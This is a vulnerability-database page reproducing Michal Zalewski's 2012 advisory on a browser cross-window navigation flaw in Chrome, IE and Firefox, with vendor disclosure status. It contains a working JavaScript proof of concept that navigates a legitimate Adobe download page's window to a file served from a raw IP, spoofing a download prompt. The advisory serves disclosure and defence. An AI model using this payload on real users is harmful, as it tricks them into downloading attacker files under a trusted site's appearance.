Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Browser Navigation Download Trick (Chrome / IE / Firefox)

🗓️ 31 May 2012 00:00:00Reported by Michal ZalewskiType 
zdt
 zdt🔗 0day.today👁 29 Views

Browser security flaw allows for arbitrary download prompts and navigation to third-party documents from same-origin window

Code
Another moderately interesting tidbit, I guess...

It is an important and little-known property of web browsers that one
document can always navigate other, non-same-origin windows to
arbitrary URLs. Perhaps more interestingly, you can also navigate
third-party documents to resources served with Content-Disposition:
attachment, in which case, you get the original contents of the
address bar, plus a rogue download prompt attached to an unsuspecting
page that never wanted you to download that file.

PoC:
http://lcamtuf.coredump.cx/fldl/

==========
<input type=submit onclick="doit()" value="Click me. I like to be clicked.">
<script>
var w;
var once;

function doit() {

  if (navigator.userAgent.indexOf('MSIE') != -1)
    w = window.open('page2.html', 'foo');
  else
    w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869">', 'foo');

  setTimeout(donext, 4500);

}

function donext() {
  window.open('http://199.58.85.40/download2.cgi', 'foo');
  if (once != true) setTimeout(donext, 5000);
  once = true;
}
</script>
==========
Chrome: reported March 30 http://code.google.com/p/chromium/issues/detail?id=121259 Fix planned, but no specific date set.

Internet Explorer: reported April 1 (case 12372gd). The vendor will not address the issue with a security patch for any current version of MSIE.

Firefox: reported March 30 https://bugzilla.mozilla.org/show_bug.cgi?id=741050 No commitment to fix at this point. 

I think these responses are fine, given the sorry state of browser UI security in general; although in good conscience, I can't dismiss the problem as completely insignificant. 


More info:
http://lcamtuf.blogspot.com/2012/05/yes-you-can-have-fun-with-downloads.html

It's closely related to many other fundamental, open issues with
browser UI design - but I guess it's an interesting highlight.

/mz



#  0day.today [2018-04-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 May 2012 00:00Current
6.9Medium risk
Vulners AI Score6.9
browser security flawarbitrary navigationthird-party documentscontent-dispositiondownload promptsame-origin windowschromeinternet explorerfirefoxvulnerabilityexploit
29